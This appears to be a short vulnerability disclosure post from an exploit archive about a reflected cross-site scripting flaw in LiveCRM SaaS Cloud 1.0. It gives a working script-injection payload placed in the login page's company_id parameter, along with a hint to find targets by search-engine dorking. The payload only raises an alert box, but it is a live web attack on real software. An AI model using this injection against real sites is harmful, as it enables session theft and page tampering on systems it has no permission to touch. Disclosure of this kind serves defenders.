LiveCRM SaaS Cloud 1.0 Cross Site Scripting

LiveCRM SaaS Cloud version 1.0 suffers from a cross site scripting vulnerability.


MD5 | 1463511629c9277f38bf3764d3a15d45

============================================================================================================================
| # Title : LiveCRM SaaS Cloud version 1.0 XSS Vulnerability |
| # Author : indoushka |
| # telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://livecrm.co/ |
| # Dork : n/a |
============================================================================================================================

poc :


[+] Dorking Adegn Google Or Other Search Enggine

[+] use payload : <script>alert(/indoushka/);</script>

http://localhost/livecrm/web/index.php?r=site/login&company_id=<script>alert(/indoushka/);</script>

Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts